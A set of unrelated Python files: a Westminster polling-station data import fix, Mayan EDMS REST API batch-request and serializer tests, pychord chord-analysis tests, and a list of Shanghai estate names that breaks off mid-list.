    def replace_station_96(self, record):
        # https://trello.com/c/HpRDeeyv/401-westminster
        if record.pollingstationnumber == "96":
            record = record._replace(
                pollingstationaddress_1="Cumberland Street",
                pollingstationaddress_2="London",
                pollingstationaddress_3="",
                pollingstationaddress_4="",
                pollingstationaddress_5="",
                pollingstationname="Holy Apostles Church Hall",
                pollingstationpostcode="SW1V 4LY",
            )
        return record

    def station_record_to_dict(self, record):
        record = self.replace_station_96(record)
        return super().station_record_to_dict(record)

    def address_record_to_dict(self, record):
        # This has to be here too, so the station ID is calculated correctly
        # from the name.
        record = self.replace_station_96(record)
        rec = super().address_record_to_dict(record)
        uprn = record.uprn.strip().lstrip("0")

        if record.housepostcode in [
            "NW8 9LJ",
            "W1U 8BD",
            "W2 5HA",
            "SW1P 4JZ",
            "NW8 8LH",
            "W2 2QN",
            "W9 3DW",
            "W9 2AL",
            "W9 1SF",
            "W10 4PR",
        ]:
            return None  # split

        # Carried-over postcode fixes
        if record.houseid == "10010095":  # W9 1DL
            rec["postcode"] = "W9 2DL"
        if uprn == "100022801294":
            rec["postcode"] = "W1J 7JJ"
        if uprn == "100023474073":
            rec["postcode"] = "W1J 6HL"
        if uprn == "10033565232":
            rec["postcode"] = "SW7 5HF"
        if uprn == "10033561131":
            rec["postcode"] = "SW1P 4SA"

        return rec
11588388
import json
import unittest

from django.db import connection, models

from rest_framework import status
from rest_framework.reverse import reverse

from mayan.apps.acls.classes import ModelPermission
from mayan.apps.rest_api.api_view_mixins import ExternalObjectAPIViewMixin
from mayan.apps.testing.tests.base import GenericViewTestCase

from .. import generics, serializers
from .base import BaseAPITestCase
from .literals import TEST_OBJECT_LABEL, TEST_OBJECT_LABEL_EDITED
from .mixins import (
    DynamicFieldSerializerAPIViewTestCaseMixin, RESTAPIViewTestMixin
)


class RESTAPIViewTestCase(RESTAPIViewTestMixin, GenericViewTestCase):
    def test_browser_api_view(self):
        response = self._request_test_browser_api_view()
        self.assertEqual(response.status_code, 200)

    @unittest.skipIf(
        connection.vendor != 'sqlite',
        'Skip for known Django issues #15802 and #27074'
    )
    def test_redoc_ui_view(self):
        response = self._request_test_redoc_ui_view()
        self.assertEqual(response.status_code, 200)

    @unittest.skipIf(
        connection.vendor != 'sqlite',
        'Skip for known Django issues #15802 and #27074'
    )
    def test_swagger_ui_view(self):
        response = self._request_test_swagger_ui_view()
        self.assertEqual(response.status_code, 200)

    def test_swagger_no_ui_json_view(self):
        self.expected_content_types = ('application/json; charset=utf-8',)
        response = self._request_test_swagger_no_ui_json_view()
        self.assertEqual(response.status_code, 200)

    def test_swagger_no_ui_yaml_view(self):
        self.expected_content_types = ('application/yaml; charset=utf-8',)
        response = self._request_test_swagger_no_ui_yaml_view()
        self.assertEqual(response.status_code, 200)


class BatchAPIRequestViewTestCase(BaseAPITestCase):
    def setUp(self):
        super().setUp()
        self._create_test_permission()

        self.TestModel = self._create_test_model(
            fields={
                'label': models.CharField(max_length=32, unique=True)
            }
        )

        ModelPermission.register(
            model=self.TestModel, permissions=(self.test_permission,)
        )

        self._create_test_object(
            instance_kwargs={'label': TEST_OBJECT_LABEL}
        )

        class TestModelSerializer(serializers.ModelSerializer):
            class Meta:
                fields = ('id', 'label')
                model = self.TestModel

        def _test_view_factory():
            class TestView(generics.ListCreateAPIView):
                mayan_object_permissions = {
                    'GET': (self.test_permission,)
                }
                mayan_view_permissions = {
                    'POST': (self.test_permission,)
                }
                queryset = self.TestModel.objects.all()
                serializer_class = TestModelSerializer

            return TestView.as_view()

        self.add_test_view(
            test_object=self.test_object,
            test_view_factory=_test_view_factory,
            test_view_url=r'^test-view-url/$'
        )
        self._test_model_list_api_view_name = self._test_view_name

        def _test_view_factory():
            TestModel = self.TestModel

            class TestView(generics.RetrieveUpdateDestroyAPIView):
                lookup_url_kwarg = 'test_object_id'
                mayan_object_permissions = {
                    'DELETE': (self.test_permission,),
                    'GET': (self.test_permission,),
                    'PATCH': (self.test_permission,),
                    'PUT': (self.test_permission,)
                }
                queryset = TestModel.objects.all()
                serializer_class = TestModelSerializer

            return TestView.as_view()

        self.add_test_view(
            test_object=self.test_object,
            test_view_factory=_test_view_factory,
            test_view_url=r'^test-view-url/(?P<test_object_id>\d+)/$'
        )
        self._test_model_detail_api_view_name = self._test_view_name

    def _request_batch_api_request_api_view(self, requests):
        return self.post(
            viewname='rest_api:batchrequest-create',
            data={'requests': requests}
        )

    def test_create_batch_api_request(self):
        self.grant_permission(permission=self.test_permission)

        requests = [
            {
                'body': {'label': TEST_OBJECT_LABEL},
                'method': 'POST',
                'name': 'test_request',
                'url': reverse(
                    viewname='rest_api:{}'.format(
                        self._test_model_list_api_view_name
                    )
                )
            }
        ]

        self.test_object.delete()
        test_model_count = self.TestModel.objects.count()

        self._clear_events()

        response = self._request_batch_api_request_api_view(
            requests=json.dumps(obj=requests)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 1)
        self.assertEqual(
            response.data['results'][0]['status_code'],
            status.HTTP_201_CREATED
        )

        self.assertEqual(
            self.TestModel.objects.count(), test_model_count + 1
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_delete_batch_api_request(self):
        self.grant_access(
            obj=self.test_object, permission=self.test_permission
        )

        requests = [
            {
                'method': 'DELETE',
                'name': 'test_request',
                'url': reverse(
                    viewname='rest_api:{}'.format(
                        self._test_model_detail_api_view_name
                    ), kwargs={'test_object_id': self.test_object.pk}
                )
            }
        ]

        test_model_count = self.TestModel.objects.count()

        self._clear_events()

        response = self._request_batch_api_request_api_view(
            requests=json.dumps(obj=requests)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 1)
        self.assertEqual(
            response.data['results'][0]['status_code'],
            status.HTTP_204_NO_CONTENT
        )

        self.assertEqual(
            self.TestModel.objects.count(), test_model_count - 1
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_edit_via_patch_batch_api_request(self):
        self.grant_access(
            obj=self.test_object, permission=self.test_permission
        )

        requests = [
            {
                'body': {'label': TEST_OBJECT_LABEL_EDITED},
                'method': 'PATCH',
                'name': 'test_request',
                'url': reverse(
                    viewname='rest_api:{}'.format(
                        self._test_model_detail_api_view_name
                    ), kwargs={'test_object_id': self.test_object.pk}
                )
            }
        ]

        test_model_label = self.test_object.label

        self._clear_events()

        response = self._request_batch_api_request_api_view(
            requests=json.dumps(obj=requests)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 1)
        self.assertEqual(
            response.data['results'][0]['status_code'], status.HTTP_200_OK
        )

        self.test_object.refresh_from_db()
        self.assertNotEqual(self.test_object.label, test_model_label)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_edit_via_put_batch_api_request(self):
        self.grant_access(
            obj=self.test_object, permission=self.test_permission
        )

        requests = [
            {
                'body': {'label': TEST_OBJECT_LABEL_EDITED},
                'method': 'PUT',
                'name': 'test_request',
                'url': reverse(
                    viewname='rest_api:{}'.format(
                        self._test_model_detail_api_view_name
                    ), kwargs={'test_object_id': self.test_object.pk}
                )
            }
        ]

        test_model_label = self.test_object.label

        self._clear_events()

        response = self._request_batch_api_request_api_view(
            requests=json.dumps(obj=requests)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 1)
        self.assertEqual(
            response.data['results'][0]['status_code'], status.HTTP_200_OK
        )

        self.test_object.refresh_from_db()
        self.assertNotEqual(self.test_object.label, test_model_label)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_list_get_batch_api_request(self):
        self.grant_access(
            obj=self.test_object, permission=self.test_permission
        )

        requests = [
            {
                'name': 'test_request',
                'url': reverse(
                    viewname='rest_api:{}'.format(
                        self._test_model_list_api_view_name
                    )
                )
            }
        ]

        self._clear_events()

        response = self._request_batch_api_request_api_view(
            requests=json.dumps(obj=requests)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 1)
        self.assertEqual(
            response.data['results'][0]['status_code'], status.HTTP_200_OK
        )
        self.assertEqual(response.data['results'][0]['data']['count'], 1)
        self.assertEqual(
            response.data['results'][0]['data']['results'][0]['id'],
            self.test_object.pk
        )

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)

    def test_mass_edit_get_batch_api_request(self):
        self.grant_access(
            obj=self.test_object, permission=self.test_permission
        )

        requests = [
            {
                'name': 'test_object_list',
                'url': reverse(
                    viewname='rest_api:{}'.format(
                        self._test_model_list_api_view_name
                    )
                )
            },
            {
                'body': {'label': TEST_OBJECT_LABEL_EDITED},
                'iterables': ['test_object_list.data.results'],
                'method': 'PATCH',
                'name': 'test_object_edit',
                'url': '{}{{{{ iterables.0.id }}}}/'.format(
                    reverse(
                        viewname='rest_api:{}'.format(
                            self._test_model_list_api_view_name
                        )
                    )
                )
            }
        ]

        test_model_label = self.test_object.label

        self._clear_events()

        response = self._request_batch_api_request_api_view(
            requests=json.dumps(obj=requests)
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 2)
        self.assertEqual(
            response.data['results'][0]['status_code'], status.HTTP_200_OK
        )
        self.assertEqual(response.data['results'][0]['data']['count'], 1)
        self.assertEqual(
            response.data['results'][0]['data']['results'][0]['id'],
            self.test_object.pk
        )
        self.assertEqual(
            response.data['results'][1]['status_code'], status.HTTP_200_OK
        )

        self.test_object.refresh_from_db()
        self.assertNotEqual(self.test_object.label, test_model_label)

        events = self._get_test_events()
        self.assertEqual(events.count(), 0)


class DynamicFieldSerializerAPIViewTestCase(
    DynamicFieldSerializerAPIViewTestCaseMixin, BaseAPITestCase
):
    def _get_test_view_class(self, serializer_class):
        local_serializer_class = serializer_class

        class TestView(generics.RetrieveAPIView):
            lookup_url_kwarg = 'test_object_id'
            queryset = self.TestModelChild.objects.all()
            serializer_class = local_serializer_class

        return TestView

    def test_current_model_only_field_single(self):
        response = self._request_test_api_view(
            query={'_fields_only': 'test_field_3'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' not in data)
        self.assertTrue('test_field_3' in data)
        self.assertTrue('test_field_4' not in data)

    def test_current_model_only_field_multiple(self):
        response = self._request_test_api_view(
            query={'_fields_only': 'test_field_3,test_field_4'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' not in data)
        self.assertTrue('test_field_3' in data)
        self.assertTrue('test_field_4' in data)

    def test_current_model_only_related_field(self):
        response = self._request_test_api_view(
            query={'_fields_only': 'parent'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' in data['parent'])
        self.assertTrue('test_field_2' in data['parent'])
        self.assertTrue('test_field_3' not in data)
        self.assertTrue('test_field_4' not in data)

    def test_related_model_only_field_single(self):
        response = self._request_test_api_view(
            query={'_fields_only': 'parent__test_field_1'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' in data['parent'])
        self.assertTrue('test_field_2' not in data['parent'])
        self.assertTrue('test_field_3' not in data)
        self.assertTrue('test_field_4' not in data)

    def test_related_model_only_field_multiple(self):
        response = self._request_test_api_view(
            query={
                '_fields_only': 'parent__test_field_1,parent__test_field_2'
            }
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' in data['parent'])
        self.assertTrue('test_field_2' in data['parent'])
        self.assertTrue('test_field_3' not in data)
        self.assertTrue('test_field_4' not in data)

    def test_current_model_exclude_field_single(self):
        response = self._request_test_api_view(
            query={'_fields_exclude': 'test_field_3'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' in data['parent'])
        self.assertTrue('test_field_2' in data['parent'])
        self.assertTrue('test_field_3' not in data)
        self.assertTrue('test_field_4' in data)

    def test_current_model_exclude_field_multiple(self):
        response = self._request_test_api_view(
            query={'_fields_exclude': 'test_field_3,test_field_4'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' in data['parent'])
        self.assertTrue('test_field_2' in data['parent'])
        self.assertTrue('test_field_3' not in data)
        self.assertTrue('test_field_4' not in data)

    def test_current_model_exclude_related_field(self):
        response = self._request_test_api_view(
            query={'_fields_exclude': 'parent'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' not in data)
        self.assertTrue('test_field_3' in data)
        self.assertTrue('test_field_4' in data)

    def test_related_model_exclude_field_single(self):
        response = self._request_test_api_view(
            query={'_fields_exclude': 'parent__test_field_1'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' not in data['parent'])
        self.assertTrue('test_field_2' in data['parent'])
        self.assertTrue('test_field_3' in data)
        self.assertTrue('test_field_4' in data)

    def test_related_model_exclude_field_multiple(self):
        response = self._request_test_api_view(
            query={
                '_fields_exclude': 'parent__test_field_1,parent__test_field_2'
            }
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' not in data['parent'])
        self.assertTrue('test_field_2' not in data['parent'])
        self.assertTrue('test_field_3' in data)
        self.assertTrue('test_field_4' in data)


class DynamicFieldSerializerWithMixinAPIViewTestCase(
    DynamicFieldSerializerAPIViewTestCaseMixin, BaseAPITestCase
):
    auto_add_test_view = True
    auto_create_test_object = False
    test_view_url = r'^test-view-url/(?P<test_object_id>\d+)/$'

    def _get_test_view_class(self, serializer_class):
        local_serializer_class = serializer_class

        class TestView(ExternalObjectAPIViewMixin, generics.RetrieveAPIView):
            external_object_queryset = self.TestModelChild.objects.all()
            external_object_pk_url_kwarg = 'test_object_id'
            lookup_url_kwarg = 'test_object_id'
            queryset = self.TestModelChild.objects.all()
            serializer_class = local_serializer_class

        return TestView

    def test_related_model_only_field_single_with_api_view_mixins(self):
        response = self._request_test_api_view(
            query={'_fields_only': 'parent__test_field_1'}
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

        data = response.json()

        self.assertTrue('parent' in data)
        self.assertTrue('test_field_1' in data['parent'])
        self.assertTrue('test_field_2' not in data['parent'])
        self.assertTrue('test_field_3' not in data)
        self.assertTrue('test_field_4' not in data)
11588402
import unittest

from pychord import Chord
from pychord.analyzer import (
    get_all_rotated_notes, find_chords_from_notes, notes_to_positions
)


class TestNotesToPositions(unittest.TestCase):

    def test_one(self):
        pos = notes_to_positions(["C"], "C")
        self.assertEqual(pos, [0])

    def test_power(self):
        pos = notes_to_positions(["C", "G"], "C")
        self.assertEqual(pos, [0, 7])

    def test_major(self):
        pos = notes_to_positions(["D", "F#", "A"], "D")
        self.assertEqual(pos, [0, 4, 7])

    def test_seventh(self):
        pos = notes_to_positions(["E", "G#", "B", "D"], "E")
        self.assertEqual(pos, [0, 4, 7, 10])

    def test_add9(self):
        pos = notes_to_positions(["Ab", "C", "Eb", "Bb"], "Ab")
        self.assertEqual(pos, [0, 4, 7, 14])

    def test_major_add_9(self):
        # major add 9 is the same as add9
        self.test_add9()

    def test_ninth(self):
        pos = notes_to_positions(["F", "A", "C", "Eb", "G"], "F")
        self.assertEqual(pos, [0, 4, 7, 10, 14])

    def test_eleventh(self):
        pos = notes_to_positions(["G", "B", "D", "F", "A", "C"], "G")
        self.assertEqual(pos, [0, 4, 7, 10, 14, 17])

    def test_thirteenth(self):
        pos = notes_to_positions(["A", "C#", "E", "G", "B", "D", "F#"], "A")
        self.assertEqual(pos, [0, 4, 7, 10, 14, 17, 21])


class TestGetAllRotatedNotes(unittest.TestCase):

    def test_two(self):
        notes_list = get_all_rotated_notes(["C", "G"])
        self.assertEqual(notes_list, [["C", "G"], ["G", "C"]])

    def test_three(self):
        notes_list = get_all_rotated_notes(["C", "F", "G"])
        self.assertEqual(
            notes_list, [["C", "F", "G"], ["F", "G", "C"], ["G", "C", "F"]]
        )


class TestFindChordsFromNotes(unittest.TestCase):

    def _assert_chords(self, notes, expected_chords):
        """ Validates that the specified notes translate to the expected chords.

        :param notes: The notes of the chord, either as a list of strings,
            e.g. ["G", "C", "D"], or a string, e.g. "G C D".
        :param expected_chords: The chords that the notes could translate to,
            specified as a list of strings, e.g. ["Gsus4", "Csus2/G"], or a
            single string if only one chord is expected.
        """
        if isinstance(notes, str):
            notes = notes.split()
        c0 = find_chords_from_notes(notes)
        if isinstance(expected_chords, str):
            expected_chords = [expected_chords]
        self.assertEqual(c0, [Chord(c) for c in expected_chords])

    def test_major(self):
        chords = find_chords_from_notes(["C", "E", "G"])
        self.assertEqual(chords, [Chord("C")])

    def test_major_on_third(self):
        chords = find_chords_from_notes(["F#", "A", "D"])
        self.assertEqual(chords, [Chord("D/F#")])

    def test_major_on_fifth(self):
        chords = find_chords_from_notes(["B", "E", "G#"])
        self.assertEqual(chords, [Chord("E/B")])

    def test_dim(self):
        chords = find_chords_from_notes(["Eb", "Gb", "A"])
        self.assertEqual(chords, [Chord("Ebdim")])

    def test_sus4(self):
        chords = find_chords_from_notes(["G", "C", "D"])
        self.assertEqual(chords, [Chord("Gsus4"), Chord("Csus2/G")])

    def test_dim6(self):
        chords = find_chords_from_notes(["Eb", "Gb", "A", "C"])
        self.assertEqual(
            chords,
            [Chord("Ebdim7"), Chord("Gbdim7/Eb"), Chord("Adim7/Eb"),
             Chord("Cdim7/Eb")]
        )

    def test_aug(self):
        chords = find_chords_from_notes(["F", "A", "Db"])
        self.assertEqual(
            chords, [Chord("Faug"), Chord("Aaug/F"), Chord("Dbaug/F")]
        )

    def test_add9(self):
        chords = find_chords_from_notes(["C", "E", "G", "D"])
        self.assertEqual(chords, [Chord("Cadd9")])

    def test_m7b5(self):
        chords = find_chords_from_notes(["F#", "A", "C", "E"])
        self.assertEqual(chords, [Chord("F#m7-5"), Chord("Am6/F#")])

    def test_m7dim5(self):
        chords = find_chords_from_notes(["F#", "A", "C", "E"])
        self.assertEqual(chords, [Chord("F#m7-5"), Chord("Am6/F#")])

    def test_add4(self):
        chords = find_chords_from_notes(["C", "E", "F", "G"])
        self.assertEqual(chords, [Chord("Cadd4")])

    def test_minor_add4(self):
        chords = find_chords_from_notes(["C", "Eb", "F", "G"])
        self.assertEqual(chords, [Chord("Cmadd4")])

    def test_minor7_add11(self):
        self._assert_chords("C Eb G Bb F", ["Cm7add11", "F11/C"])

    def test_major7_add11(self):
        self._assert_chords("C E G B F", "CM7add11")

    def test_minormajor7_add11(self):
        self._assert_chords("C Eb G B F", "CmM7add11")

    def test_major7_add13(self):
        self._assert_chords("C E G A B D", "CM7add13")

    def test_idempotence(self):
        for _ in range(2):
            chords = find_chords_from_notes(["Eb", "Gb", "A", "C"])
            self.assertEqual(
                chords,
                [Chord("Ebdim7"), Chord("Gbdim7/Eb"), Chord("Adim7/Eb"),
                 Chord("Cdim7/Eb")]
            )
            self.assertEqual(
                chords[0].components(visible=True), ["Eb", "Gb", "A", "C"]
            )
11588455
estate=[ "绿地崴廉公寓", "东方城市花园", "陆家嘴中央公寓", "明园森林都市", "品家都市星城", "金色黄浦", "东方星座", "上海康城", "海湾豪宅", "万科城市花园", "魅力之城", "山水别墅", "旗忠高尔夫", "康桥水都", "新江湾城", "上海梦想", "雍景苑", "紫丁香花园", "山水国际", "阳光威尼斯", "阳光欧洲城", "阳光国际公寓", "广兰名苑", "新湖明珠城", "南郊别墅", "地杰国际城", "大华锦绣华城", "绿地康桥新苑", "康桥老街", "白玉兰花园", "静安凤凰苑", "徐汇新城", "星河世纪城", "星月蓝湾", "金沙雅苑滨湖世家", "城市经典", "玉墅", "江南星城", "纯翠江南", "春申景城", "中星海上景庭", "万科蓝山小城", "经纬城市绿洲", "阳光水岸家园", "瑞虹新城优贤生活", "安亭新镇", "苏堤春晓名苑", "万邦都市花园", "夏朵小城", "华银坊", "贝越高行馨苑", "四季绿城", "富林四季", "诺丁区", "海上国际花园", "金外滩花园", "崇明新城明珠花苑", "中虹明珠苑", "春江锦庐", "嘉城", "金色奥斯卡", "金爵别墅", "上海春城", "世茂滨江花园", "华升新苑", "知雅汇", "志成花苑", "中远两湾城", "璀璨天成", "莘庄沁春园", "小沪春秋", "象源丽都", "上海奥林匹克花园", "丽江锦庭", "阳光神州苑", "蔚蓝城市花园", "金桥新城", "泰鸿新苑", "东方花园", "幸福小镇", "明丰绿都", "嘉利明珠城", "中鼎豪园", "巨峰家苑", "环元苑", "康河原味", "南洋博仕欣居", "冠龙家园", "风华水岸", "蓝色港湾", "博馨苑", "好莱坞花园", "星辰园", "涵合园", "静安桂花园", "爵士静安", "证大家园", "上海故事", "樱源晶舍", "佳龙花园", "万科假日风景4期", "生活的艺术", "中环明珠", "景明花园", "三盛颐景园", "恒大翰城国际", "上海绿城", "番禺大厦", "九歌名苑", "春申复地城", "柏林春天", "慧芝湖花园", "耀江国际广场", "市中心", "中梅苑", "上海紫园", "曲阳名邸", "卢湾都市花园", "水清华庭", "珠江新城", "沈默荷兰园", "金象大厦", "大城小室", "国际丽都城", "保利名园别墅", "舞榭园", "新申花城玉兰苑", "金地格林春岸", "棕榈湾花园", "延铁家园", "罗山精华", "通联阁", "睿园大厦", "金荣公寓", "中梅苑", "大华公园世家", "大华社区", "联业大厦", "上大社区", "天宝华庭", "怡泰家苑", "南天公寓", "青浦佳乐苑", "白雪公主", "阳光神州苑", "南新苑", "沪华公寓", "国际花园", "阳光威尼斯", "绿福公寓", "绿梅公寓", "鑫隆花园", "富邑华庭", "澄品金象华庭别墅", "水景苑", "汇金广场", "大名公寓", "四季全景台", "恒德花园", "华丽公寓", "中凯佘山别墅", "新风尚", "友力大厦", "金岛大厦", "玫瑰园", "九间堂", "万科兰乔圣菲", "建华新苑", "海波花苑", "兴日家园", "爵士阅", "长宏新苑", "海光公寓", "雅墅", "临泷佳苑", "龙柏中康公寓", "永新花苑", "佳成大厦", "中新公寓", "上海莘城", "都市情园", "百草园", "百乐公寓", "新月翡翠园", "盛大金磐", "源水新墅", "航天新苑", "时峰不夜城", "静安诺丁汉", "仙霞良品", "铭晖西郊苑", "汤臣豪园", "瑞金尊邸", "环龙新苑", "幸福春天", "鹏程花苑", "大华锦绣华城", "鑫城苑", "莘庄沁春园", "小沪春秋", "开元新都", "菊园", "汇豪天下", "凌兆人家", "泰宸景苑", "华尔道芙", "华菁南方公寓", "华丽家族", "上品巨洋豪园", "汇秀公寓", "星际公寓", "福泉苑", "绝对城市", "美地芳邻苑", "仙霞福运", "水岸枫叶", "新实地公寓", "爱法新城", "绿洲中环中心", "绿洲湖畔花园", "佘山月湖山庄", "海悦公寓", "丹枫苑", "银东大厦", "宝丽金大厦", "百盛园", "人才大厦", "名都城", "知汇名邸", "学林苑", "桃园", "瑞金花园", "中邦晶座·城市别墅", "佘山高尔夫", "现代缘墅", "集成公寓", "中祥金祥苑", "颐河苑", "香港丽园", "新家坡园景苑", "金日世家玉兰苑", "莘闵荣顺苑", "汇元坊", "紫荆新苑", "臻园", "万科城市花园", "魅力之城", "华高庭园", "顺风公寓", "扬子江家园", "怡君苑", "学苑风范", "仁德坊", "开元地中海", "联洋花园", "联洋年华", "天科苑", "蔚蓝海岸", "建国大厦", "云山星座苑", "新梅莘苑", "恒大翰城", "中辉新苑", "森陇家园", "共富鑫鑫花园", "虹桥高尔夫别墅", "大众家园", "贝越佳园", "金纬花苑", "广洋苑", "张杨水想曲", "思南公寓", "市中心", "凯阳新寓", "虹口金地汇", "今日丽园", "新华舍", "茗园南昌苑", "水清华庭", "建德坊", "瑞丰园", "骏豪国际", "凇宏苑", "强生花苑", "徐汇枫景", "上海年华", "瑞生花园", "水岸豪庭", "汇峰衡苑", "兴东佳苑", "懿文大厦", "上海知音", "华发小区", "海德花园", "白玉兰花园", "金淙苑家源", "陆家嘴生活中心", "百合花苑", "樱源晶舍", "东珂臻品", "明纶园", "东方莱茵", "长峰新村", "怡水新镇", "君悦静安", "新贵都万体景苑", "阳光四季公寓", "莲浦花苑", "自由自宅", "时代逸居", "高峰汇", "瑞南新苑", "泰鸿新苑", "绿野香洲", "团结花苑", "华济苑", "东苑新天地", "金汇花园", "金汇名人苑", "上影广场公寓", "四季绿城", "都市宜家", "北美枫情", "紫元大厦", "静安豪景", "西郊佳景苑", "墅博汇", "锦汇苑", "祁连新村", "半岛豪门", "名仕苑帝庭阁", "高安公寓", "金地格林世界", "金纺苑", "田林兰桂坊", "东湖大厦", "未来域", "锦绣年华", "美之苑", "嘉善公寓", "永泰花苑", "银马郡庭", "中星巨野公寓", "名人花苑", "杉林新月", "康健丽都", "永新花苑", "汇达苑", "环球中央花园", "富弘苑", "金虹大厦", "观景阁", "东湾小区", "金外滩花园", "南华苑", "华玉苑", "环线广场", "华府天地", "瑶成湾花园", "观景苑", "爱建城", "佳安公寓", "嘉宝都市港", "金桥新城", "紫虹嘉苑", "青之杰花园", "吴淞新城", "鑫城苑座", "生活艺术居", "新邻地", "嘉瑞花苑", "双五新家园", "伦敦广场", "东方伦敦花园", "均瑶国际广场", "生活艺术居", "新领地", "田林亲家", "东泉新村", "雪野别墅", "新芳邻", "宜居田林", "海上明珠园", "金铭福邸", "东方文苑", "阳光新景", "鑫泰园", "北方佳苑", "蔚蓝城市花园", "徐汇高公馆", "高欣公寓", "徐汇枫情", "明晖苑", "丽江锦庭", "山水别墅", "旗忠高尔夫", "金海湾", "康惠花苑", "十里都华", "兆丰帝景苑", "帝苑名品广场", "合家欢", "虹桥大仕馆", "大学源", "松云水苑国际社区", "家旺新苑", "城城金岛苑", "芳草苑", "泗海怡家", "岭南翠庭", "长华绿苑", "长发大厦", "绿地崴廉公寓", "皇骐爱丽舍", "康惠苑", "证大家园", "复地翠堤苑", "宏莲馨苑", "大唐盛世花园", "品味人家同德公寓", "福源汇居", "今和家园", "林茵香榭", "逸兴家园", "武宁苑", 
"逸仙华庭", "双秀家园", "华山正力公寓", "静巷府邸", "华升新苑", "新江湾城", "上海梦想", "雍景苑", "静安雅筑", "虹桥怡景苑", "虹桥加州花苑", "上海富宏花园", "慧芝湖花园", "盛世香樟园", "华林新苑", "龙柏新村", "同济艺墅", "贝越流明新苑", "汇元坊", "千诗万绿", "上海鸿禧花园", "滨河景城", "永汇新苑", "保利名园别墅", "舞榭园", "罗秀新苑", "七宝绿都", "宝虹新苑", "阳光欧洲城", "蔷薇绅邻", "都林嘉园", "茂盛花苑", "雅舍小品", "南郊花园", "虹桥万博花园", "花木白杨", "大上海国际花园", "翡翠苑", "沪航公寓", "金隆海悦", "金色维也纳", "上海莘城", "莘秀苑", "英伦生活", "恒大翰城", "瀚锦苑", "盛顺意苑", "美丽家园", "品家都市星城", "锦绣满堂", "博文园", "宛平南苑", "千代别墅", "澳丽花苑", "松风花园", "东方港湾·金杰", "华夏家", "川杨璟园", "阳光欧洲城", "源水新墅", "新梅花苑", "吉富绅花园", "绿地春申花园", "绿地春申花园", "浅水湾花园", "华轩大厦", "士博汇弘辉名苑", "四季晶园", "上海大花园", "滨江兰庭", "滨江国际", "东南华庭", "东方知音", "河滨传奇", "河畔明珠公寓", "虹桥上海城", "虹桥豪苑", "圣天地", "森香水筑", "光鸿苑", "欣武大厦", "山水国际", "静安晶华园", "济阳人家", "莲浦新苑", "春江锦庐", "风和俪墅", "蕙兰苑", "澳丽花苑", "景江苑", "丽水香郡", "河滨香景园", "德福苑", "爱博大厦", "古北国际广场", "精英会", "颐峰苑", "云福大厦", "外高桥荷兰城", "布鲁克林", "中海馨苑", "明日新苑", "禄德嘉苑", "竹韵浩庭", "克拉水城", "未来世界", "舒城苑", "皇府别墅", "静安艺阁", "蓝色港湾", "博馨苑", "盛大花园", "紫苑小区", "海信花苑", "维也纳坡景森墅", "大运盛城", "水岸家园", "三春汇秀苑", "兆丰帝景苑", "新都城公寓", "金桥立方城", "紫藤居", "天阁公寓", "新城名庭", "海欣公寓", "城市丽景", "泰燕华庭", "曹杨君悦苑", "龙距大厦", "海德公寓", "景沧公寓", "周庄江南人家", "都林龙苑", "丽茵别墅", "星罗苑", "新华别庄", "顺达苑", "绿洲比华利花园", "西南名苑", "明杨豪苑", "在水一方", "欢喜临门", "金沙丽晶苑", "商务先锋", "东方名园", "黄金水岸", "嘉德公寓", "中星海上景庭", "宜德苑", "天杰徐汇", "嘉里华庭", "百富达公寓", "好世麒麟园", "中华淮海中华大厦", "嘉禄新苑", "金杨馨苑", "嘉定颐景园", "城市经典", "玉墅", "嘉禄新苑", "东方龙苑", "莱顿小城", "桃花源田庄", "世袭领地", "东苑大千美墅", "天元公寓", "天枫公寓", "古北红人馆", "丰泽湾", "巴黎春天", "博爱家园", "丽都大厦", "静安阳光名都", "古浪苑", "海东公寓", "长宁鉴筑", "宜嘉坊", "明月星河", "华丰佳园", "宁和公寓", "益丰新村", "东晶国际", "陆家嘴自由空间", "雅仕兰庭伊顿公寓", "龙腾苑", "蝶恋园", "金风玉露", "虹桥中园", "四季草堂", "金都花好月圆", "怡东花园", "绿庭百合苑", "新天地河滨花园", "雅仕轩", "金露苑", "天歌花园", "明光苑", "嘉瑞花苑", "双五新家园", "洪山花苑", "幸之苑", "钻石城中城", "瑞金福地", "福华花苑", "金顶公寓", "达安圣芭芭花园", "春辉苑", "金色港湾公寓", "八方大厦", "中鼎豪园", "爱法花园", "黄浦新殿", "佳日公寓", "紫光大厦", "尚城捷座", "中祥龙柏苑", "中皇广场", "智慧岭秀", "写意春秋", 